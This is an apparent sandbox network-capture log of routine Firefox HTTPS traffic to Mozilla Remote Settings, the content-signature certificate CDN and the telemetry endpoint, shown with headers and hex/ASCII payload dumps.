2024-07-26 18:11:02 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2609 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:02 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	64221	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:02 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2609 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:02 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	64222	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:02 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2609 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:02 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	64226	34.160.144.191	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	334	OUT	GET /chains/202402/aus.content-signature.mozilla.org-2024-09-02-22-40-36.chain HTTP/1.1 Host: content-signature-2.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:02 UTC	548	IN	HTTP/1.1 200 OK X-Amz-Id-2: MYa7wq3lB7rXG13jdoZY01cFvKamMQ7iEuQ4mMFL6JW3FjnhqTgg7hv4cL393chzPO6I1grpjbXObyu/BekkRQ== X-Amz-Request-Id: BKH4GXJYSZ9918E5 X-Amz-Server-Side-Encryption: AES256 Content-Disposition: attachment Accept-Ranges: bytes Server: AmazonS3 Content-Length: 5319 Via: 1.1 google Date: Fri, 26 Jul 2024 18:03:45 GMT Age: 437 Last-Modified: Sun, 14 Jul 2024 22:40:37 GMT ETag: "3ad57b14551f1c973efcf80de587880d" Content-Type: binary/octet-stream Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	842	IN	Data Raw: 2d 2d 2d 2d 2d 42 45 47 49 4e 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 4d 49 49 43 36 7a 43 43 41 6e 47 67 41 77 49 42 41 67 49 49 46 2b 49 31 67 52 46 6c 5a 50 51 77 43 67 59 49 4b 6f 5a 49 7a 6a 30 45 41 77 4d 77 67 61 4d 78 43 7a 41 4a 42 67 4e 56 42 41 59 54 0a 41 6c 56 54 4d 52 77 77 47 67 59 44 56 51 51 4b 45 78 4e 4e 62 33 70 70 62 47 78 68 49 45 4e 76 63 6e 42 76 63 6d 46 30 61 57 39 75 4d 53 38 77 4c 51 59 44 56 51 51 4c 45 79 5a 4e 62 33 70 70 0a 62 47 78 68 49 45 46 4e 54 79 42 51 63 6d 39 6b 64 57 4e 30 61 57 39 75 49 46 4e 70 5a 32 35 70 62 6d 63 67 55 32 56 79 64 6d 6c 6a 5a 54 46 46 4d 45 4d 47 41 31 55 45 41 77 77 38 51 32 39 75 0a 64 47 56 75 64 43 42 54 61 57 64 75 61 57 35 6e 49 45 6c 75 64 47 56 79 62 57 56 6b 61 57 46 30 Data Ascii: -----BEGIN CERTIFICATE-----MIIC6zCCAnGgAwIBAgIIF+I1gRFlZPQwCgYIKoZIzj0EAwMwgaMxCzAJBgNVBAYTAlVTMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMS8wLQYDVQQLEyZNb3ppbGxhIEFNTyBQcm9kdWN0aW9uIFNpZ25pbmcgU2VydmljZTFFMEMGA1UEAww8Q29udGVudCBTaWduaW5nIEludGVybWVkaWF0
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 56 7a 4c 6d 4e 76 62 6e 52 6c 62 6e 51 74 63 32 6c 6e 62 6d 46 30 64 58 4a 6c 4c 6d 31 76 0a 65 6d 6c 73 62 47 45 75 62 33 4a 6e 4d 41 6f 47 43 43 71 47 53 4d 34 39 42 41 4d 44 41 32 67 41 4d 47 55 43 4d 51 44 42 37 41 72 44 62 58 77 6a 39 61 33 6e 74 39 53 39 53 4c 71 63 53 74 61 6f 0a 4f 4f 41 59 73 78 30 4c 57 52 6a 74 43 31 65 44 35 2b 43 37 46 46 53 6b 32 6f 62 2b 4e 6b 46 43 6f 5a 69 61 4a 57 6f 43 4d 48 47 66 5a 32 59 77 55 57 4d 71 34 45 70 36 69 33 44 4b 2b 58 5a 48 0a 68 56 67 38 75 6f 5a 47 67 67 6a 70 71 78 4c 74 2b 35 65 69 6f 6f 51 79 46 75 66 57 78 51 4c 2b 65 44 45 36 2b 54 4f 56 61 67 3d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 43 45 52 54 49 46 49 43 41 54 45 2d Data Ascii: VzLmNvbnRlbnQtc2lnbmF0dXJlLm1vemlsbGEub3JnMAoGCCqGSM49BAMDA2gAMGUCMQDB7ArDbXwj9a3nt9S9SLqcStaoOOAYsx0LWRjtC1eD5+C7FFSk2ob+NkFCoZiaJWoCMHGfZ2YwUWMq4Ep6i3DK+XZHhVg8uoZGggjpqxLt+5eiooQyFufWxQL+eDE6+TOVag==-----END CERTIFICATE----------BEGIN CERTIFICATE-
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 6d 55 75 62 57 39 36 61 57 78 73 59 53 35 76 63 6d 63 77 48 34 49 64 59 32 39 75 64 47 56 75 64 43 31 7a 61 57 64 75 0a 59 58 52 31 63 6d 55 75 62 57 39 36 61 57 78 73 59 53 35 76 63 6d 63 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 4d 42 51 41 44 67 67 49 42 41 41 32 79 39 46 4d 73 42 47 30 66 6b 72 30 6f 0a 6b 6e 50 68 64 4e 48 4d 64 57 4f 50 75 6b 6e 75 48 6f 43 68 74 61 32 33 75 57 6b 50 6e 74 41 6b 51 7a 4d 71 36 73 72 49 6f 56 4c 57 6d 4e 54 73 75 6e 4c 4c 32 30 67 75 4f 54 31 41 6d 6a 42 39 0a 77 75 34 43 4d 52 31 37 32 52 32 41 37 6a 42 48 6e 69 76 42 6f 6a 4e 77 2f 6e 46 78 65 69 4e 31 65 4c 38 64 68 6b 79 48 6e 6b 48 5a 4d 75 76 6a 55 50 74 74 63 62 51 79 69 34 39 74 63 58 2b 63 0a 4c 42 41 4b 66 55 77 77 49 57 53 2b 7a 4d 4e 2b 31 78 6d 59 Data Ascii: mUubW96aWxsYS5vcmcwH4IdY29udGVudC1zaWduYXR1cmUubW96aWxsYS5vcmcwDQYJKoZIhvcNAQEMBQADggIBAA2y9FMsBG0fkr0oknPhdNHMdWOPuknuHoChta23uWkPntAkQzMq6srIoVLWmNTsunLL20guOT1AmjB9wu4CMR172R2A7jBHnivBojNw/nFxeiN1eL8dhkyHnkHZMuvjUPttcbQyi49tcX+cLBAKfUwwIWS+zMN+1xmY
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 68 54 6d 2b 41 44 50 67 39 5a 73 51 46 6f 62 6d 53 64 7a 41 77 43 54 6e 39 77 64 55 62 4f 6b 4b 0a 4b 78 36 35 66 4b 71 70 54 62 54 78 71 6e 71 5a 36 54 53 58 43 36 4f 79 62 45 71 71 68 4e 7a 56 4a 75 39 6a 49 4b 69 42 30 59 45 30 62 4b 6c 4c 50 75 79 79 44 78 6e 75 39 75 74 6c 50 6a 66 30 0a 39 43 7a 32 46 53 33 75 4b 32 64 6b 51 78 36 47 6d 59 57 47 4f 32 76 66 75 50 5a 68 7a 69 50 34 4e 6d 42 51 66 76 63 6d 59 78 50 6c 33 61 5a 55 39 70 41 59 41 4f 44 2f 48 57 2b 34 75 79 4e 4c 0a 53 49 75 47 39 41 64 44 65 73 76 54 49 53 2f 67 6b 57 53 63 73 58 52 58 74 73 41 63 70 43 56 39 65 43 37 49 58 69 72 44 4e 57 73 78 34 32 54 75 65 6b 69 6a 61 31 76 46 51 43 55 79 35 4b 55 63 0a 51 70 72 49 6b 36 39 50 48 35 7a 38 67 79 70 6d 6e 6d 64 41 62 62 4c 6f 49 6e 48 Data Ascii: hTm+ADPg9ZsQFobmSdzAwCTn9wdUbOkKKx65fKqpTbTxqnqZ6TSXC6OybEqqhNzVJu9jIKiB0YE0bKlLPuyyDxnu9utlPjf09Cz2FS3uK2dkQx6GmYWGO2vfuPZhziP4NmBQfvcmYxPl3aZU9pAYAOD/HW+4uyNLSIuG9AdDesvTIS/gkWScsXRXtsAcpCV9eC7IXirDNWsx42Tuekija1vFQCUy5KUcQprIk69PH5z8gypmnmdAbbLoInH
2024-07-26 18:11:02 UTC	307	IN	Data Raw: 73 34 51 6e 6c 79 76 0a 4f 55 72 57 64 32 64 75 34 64 4c 43 73 2b 57 57 32 45 36 2b 52 37 6a 5a 74 72 73 49 71 46 44 36 71 77 43 4c 71 63 67 42 67 43 39 43 4d 39 55 67 48 65 55 42 4f 69 78 6d 5a 4c 42 4b 43 4e 44 45 0a 4e 31 73 52 6b 6d 63 56 77 58 63 43 6c 35 62 74 64 67 56 56 71 37 34 4d 67 73 64 33 38 78 73 6d 59 75 46 6f 4d 69 36 6e 62 44 4c 6c 6c 6d 36 54 32 71 6c 38 4c 5a 45 78 79 58 32 69 2f 76 6f 30 0a 70 78 68 45 56 52 61 46 77 6a 31 4a 31 72 33 54 52 4e 58 6b 73 6a 64 71 46 63 67 70 4e 43 4d 66 32 46 52 62 6a 44 47 74 56 4c 58 52 56 47 30 44 43 43 47 52 61 79 69 67 4b 67 64 48 37 38 71 4d 0a 48 70 64 58 72 62 61 54 44 46 73 66 4d 4c 54 41 4d 6e 47 46 6e 71 4f 5a 4d 75 4d 6f 62 4e 4a 53 35 4d 36 2f 76 71 64 65 70 6f 43 38 4c 37 78 6d 49 35 64 51 Data Ascii: s4QnlyvOUrWd2du4dLCs+WW2E6+R7jZtrsIqFD6qwCLqcgBgC9CM9UgHeUBOixmZLBKCNDEN1sRkmcVwXcCl5btdgVVq74Mgsd38xsmYuFoMi6nbDLllm6T2ql8LZExyX2i/vo0pxhEVRaFwj1J1r3TRNXksjdqFcgpNCMf2FRbjDGtVLXRVG0DCCGRayigKgdH78qMHpdXrbaTDFsfMLTAMnGFnqOZMuMobNJS5M6/vqdepoC8L7xmI5dQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	64227	34.160.144.191	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	334	OUT	GET /chains/202402/aus.content-signature.mozilla.org-2024-09-02-22-40-36.chain HTTP/1.1 Host: content-signature-2.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:02 UTC	548	IN	HTTP/1.1 200 OK X-Amz-Id-2: 04ZuZ6bHA9JeezcRPTNtY6EvOxwRXvZUBgMtt+xP0yohemNCJzk3gFJ32ocICFWPCdg4cQIgbRHkNOXwn97osQ== X-Amz-Request-Id: G07V96MQ3H4DKWFV X-Amz-Server-Side-Encryption: AES256 Content-Disposition: attachment Accept-Ranges: bytes Server: AmazonS3 Content-Length: 5319 Via: 1.1 google Date: Fri, 26 Jul 2024 18:03:58 GMT Age: 424 Last-Modified: Sun, 14 Jul 2024 22:40:37 GMT ETag: "3ad57b14551f1c973efcf80de587880d" Content-Type: binary/octet-stream Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	842	IN	Data Raw: 2d 2d 2d 2d 2d 42 45 47 49 4e 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 4d 49 49 43 36 7a 43 43 41 6e 47 67 41 77 49 42 41 67 49 49 46 2b 49 31 67 52 46 6c 5a 50 51 77 43 67 59 49 4b 6f 5a 49 7a 6a 30 45 41 77 4d 77 67 61 4d 78 43 7a 41 4a 42 67 4e 56 42 41 59 54 0a 41 6c 56 54 4d 52 77 77 47 67 59 44 56 51 51 4b 45 78 4e 4e 62 33 70 70 62 47 78 68 49 45 4e 76 63 6e 42 76 63 6d 46 30 61 57 39 75 4d 53 38 77 4c 51 59 44 56 51 51 4c 45 79 5a 4e 62 33 70 70 0a 62 47 78 68 49 45 46 4e 54 79 42 51 63 6d 39 6b 64 57 4e 30 61 57 39 75 49 46 4e 70 5a 32 35 70 62 6d 63 67 55 32 56 79 64 6d 6c 6a 5a 54 46 46 4d 45 4d 47 41 31 55 45 41 77 77 38 51 32 39 75 0a 64 47 56 75 64 43 42 54 61 57 64 75 61 57 35 6e 49 45 6c 75 64 47 56 79 62 57 56 6b 61 57 46 30 Data Ascii: -----BEGIN CERTIFICATE-----MIIC6zCCAnGgAwIBAgIIF+I1gRFlZPQwCgYIKoZIzj0EAwMwgaMxCzAJBgNVBAYTAlVTMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMS8wLQYDVQQLEyZNb3ppbGxhIEFNTyBQcm9kdWN0aW9uIFNpZ25pbmcgU2VydmljZTFFMEMGA1UEAww8Q29udGVudCBTaWduaW5nIEludGVybWVkaWF0
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 56 7a 4c 6d 4e 76 62 6e 52 6c 62 6e 51 74 63 32 6c 6e 62 6d 46 30 64 58 4a 6c 4c 6d 31 76 0a 65 6d 6c 73 62 47 45 75 62 33 4a 6e 4d 41 6f 47 43 43 71 47 53 4d 34 39 42 41 4d 44 41 32 67 41 4d 47 55 43 4d 51 44 42 37 41 72 44 62 58 77 6a 39 61 33 6e 74 39 53 39 53 4c 71 63 53 74 61 6f 0a 4f 4f 41 59 73 78 30 4c 57 52 6a 74 43 31 65 44 35 2b 43 37 46 46 53 6b 32 6f 62 2b 4e 6b 46 43 6f 5a 69 61 4a 57 6f 43 4d 48 47 66 5a 32 59 77 55 57 4d 71 34 45 70 36 69 33 44 4b 2b 58 5a 48 0a 68 56 67 38 75 6f 5a 47 67 67 6a 70 71 78 4c 74 2b 35 65 69 6f 6f 51 79 46 75 66 57 78 51 4c 2b 65 44 45 36 2b 54 4f 56 61 67 3d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 43 45 52 54 49 46 49 43 41 54 45 2d Data Ascii: VzLmNvbnRlbnQtc2lnbmF0dXJlLm1vemlsbGEub3JnMAoGCCqGSM49BAMDA2gAMGUCMQDB7ArDbXwj9a3nt9S9SLqcStaoOOAYsx0LWRjtC1eD5+C7FFSk2ob+NkFCoZiaJWoCMHGfZ2YwUWMq4Ep6i3DK+XZHhVg8uoZGggjpqxLt+5eiooQyFufWxQL+eDE6+TOVag==-----END CERTIFICATE----------BEGIN CERTIFICATE-
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 6d 55 75 62 57 39 36 61 57 78 73 59 53 35 76 63 6d 63 77 48 34 49 64 59 32 39 75 64 47 56 75 64 43 31 7a 61 57 64 75 0a 59 58 52 31 63 6d 55 75 62 57 39 36 61 57 78 73 59 53 35 76 63 6d 63 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 4d 42 51 41 44 67 67 49 42 41 41 32 79 39 46 4d 73 42 47 30 66 6b 72 30 6f 0a 6b 6e 50 68 64 4e 48 4d 64 57 4f 50 75 6b 6e 75 48 6f 43 68 74 61 32 33 75 57 6b 50 6e 74 41 6b 51 7a 4d 71 36 73 72 49 6f 56 4c 57 6d 4e 54 73 75 6e 4c 4c 32 30 67 75 4f 54 31 41 6d 6a 42 39 0a 77 75 34 43 4d 52 31 37 32 52 32 41 37 6a 42 48 6e 69 76 42 6f 6a 4e 77 2f 6e 46 78 65 69 4e 31 65 4c 38 64 68 6b 79 48 6e 6b 48 5a 4d 75 76 6a 55 50 74 74 63 62 51 79 69 34 39 74 63 58 2b 63 0a 4c 42 41 4b 66 55 77 77 49 57 53 2b 7a 4d 4e 2b 31 78 6d 59 Data Ascii: mUubW96aWxsYS5vcmcwH4IdY29udGVudC1zaWduYXR1cmUubW96aWxsYS5vcmcwDQYJKoZIhvcNAQEMBQADggIBAA2y9FMsBG0fkr0oknPhdNHMdWOPuknuHoChta23uWkPntAkQzMq6srIoVLWmNTsunLL20guOT1AmjB9wu4CMR172R2A7jBHnivBojNw/nFxeiN1eL8dhkyHnkHZMuvjUPttcbQyi49tcX+cLBAKfUwwIWS+zMN+1xmY
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 68 54 6d 2b 41 44 50 67 39 5a 73 51 46 6f 62 6d 53 64 7a 41 77 43 54 6e 39 77 64 55 62 4f 6b 4b 0a 4b 78 36 35 66 4b 71 70 54 62 54 78 71 6e 71 5a 36 54 53 58 43 36 4f 79 62 45 71 71 68 4e 7a 56 4a 75 39 6a 49 4b 69 42 30 59 45 30 62 4b 6c 4c 50 75 79 79 44 78 6e 75 39 75 74 6c 50 6a 66 30 0a 39 43 7a 32 46 53 33 75 4b 32 64 6b 51 78 36 47 6d 59 57 47 4f 32 76 66 75 50 5a 68 7a 69 50 34 4e 6d 42 51 66 76 63 6d 59 78 50 6c 33 61 5a 55 39 70 41 59 41 4f 44 2f 48 57 2b 34 75 79 4e 4c 0a 53 49 75 47 39 41 64 44 65 73 76 54 49 53 2f 67 6b 57 53 63 73 58 52 58 74 73 41 63 70 43 56 39 65 43 37 49 58 69 72 44 4e 57 73 78 34 32 54 75 65 6b 69 6a 61 31 76 46 51 43 55 79 35 4b 55 63 0a 51 70 72 49 6b 36 39 50 48 35 7a 38 67 79 70 6d 6e 6d 64 41 62 62 4c 6f 49 6e 48 Data Ascii: hTm+ADPg9ZsQFobmSdzAwCTn9wdUbOkKKx65fKqpTbTxqnqZ6TSXC6OybEqqhNzVJu9jIKiB0YE0bKlLPuyyDxnu9utlPjf09Cz2FS3uK2dkQx6GmYWGO2vfuPZhziP4NmBQfvcmYxPl3aZU9pAYAOD/HW+4uyNLSIuG9AdDesvTIS/gkWScsXRXtsAcpCV9eC7IXirDNWsx42Tuekija1vFQCUy5KUcQprIk69PH5z8gypmnmdAbbLoInH
2024-07-26 18:11:02 UTC	307	IN	Data Raw: 73 34 51 6e 6c 79 76 0a 4f 55 72 57 64 32 64 75 34 64 4c 43 73 2b 57 57 32 45 36 2b 52 37 6a 5a 74 72 73 49 71 46 44 36 71 77 43 4c 71 63 67 42 67 43 39 43 4d 39 55 67 48 65 55 42 4f 69 78 6d 5a 4c 42 4b 43 4e 44 45 0a 4e 31 73 52 6b 6d 63 56 77 58 63 43 6c 35 62 74 64 67 56 56 71 37 34 4d 67 73 64 33 38 78 73 6d 59 75 46 6f 4d 69 36 6e 62 44 4c 6c 6c 6d 36 54 32 71 6c 38 4c 5a 45 78 79 58 32 69 2f 76 6f 30 0a 70 78 68 45 56 52 61 46 77 6a 31 4a 31 72 33 54 52 4e 58 6b 73 6a 64 71 46 63 67 70 4e 43 4d 66 32 46 52 62 6a 44 47 74 56 4c 58 52 56 47 30 44 43 43 47 52 61 79 69 67 4b 67 64 48 37 38 71 4d 0a 48 70 64 58 72 62 61 54 44 46 73 66 4d 4c 54 41 4d 6e 47 46 6e 71 4f 5a 4d 75 4d 6f 62 4e 4a 53 35 4d 36 2f 76 71 64 65 70 6f 43 38 4c 37 78 6d 49 35 64 51 Data Ascii: s4QnlyvOUrWd2du4dLCs+WW2E6+R7jZtrsIqFD6qwCLqcgBgC9CM9UgHeUBOixmZLBKCNDEN1sRkmcVwXcCl5btdgVVq74Mgsd38xsmYuFoMi6nbDLllm6T2ql8LZExyX2i/vo0pxhEVRaFwj1J1r3TRNXksjdqFcgpNCMf2FRbjDGtVLXRVG0DCCGRayigKgdH78qMHpdXrbaTDFsfMLTAMnGFnqOZMuMobNJS5M6/vqdepoC8L7xmI5dQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	64228	34.120.208.123	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	618	OUT	POST /submit/firefox-desktop/newtab/1/43bb9a55-74a2-452e-8233-6899a7f737b0 HTTP/1.1 Host: incoming.telemetry.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br content-encoding: gzip content-length: 795 content-type: application/json; charset=utf-8 date: Fri, 26 Jul 2024 19:27:30 GMT x-telemetry-agent: Glean/53.2.0 (Rust on Windows) Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: none Pragma: no-cache Cache-Control: no-cache
2024-07-26 18:11:02 UTC	795	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 9d 54 db 8e db 36 10 fd 17 bd c6 14 48 99 ba fe 41 9f 9b a2 0f 41 20 f0 32 92 89 c8 a4 42 52 de 18 0b ff 7b 87 92 ec f5 26 db 16 08 60 18 f6 cc 99 99 c3 33 97 d7 6c 36 76 ec 8d 1d 5c d6 bd 66 01 be 67 5d 79 c8 42 14 3e f6 d1 9c 21 eb b2 82 16 47 c2 28 a1 fc 33 e3 1d a7 9f 28 eb 28 cd 0e 19 58 fd bf 18 0f 22 38 8b 08 0b 2f 51 c8 3e 40 08 c6 d9 1e 63 53 86 1f 33 78 cc 60 63 d8 ca fb 99 08 4d 22 4c 70 86 e8 af c4 bb 69 72 4b 4c 4e e9 85 55 27 cc a4 9c 8d 68 5f c3 a3 17 c9 17 af 73 62 61 cd 59 2e e1 11 94 18 a6 df 29 ff 1f 1a fd 7c 90 65 db ca 9a 14 72 00 c2 e9 20 88 00 75 24 a5 2c 99 56 1a 86 aa 2c b2 db ed 90 a9 70 21 e6 3c 3b 1f 89 47 2e 22 c0 87 4c c0 0a 39 01 79 43 ff 06 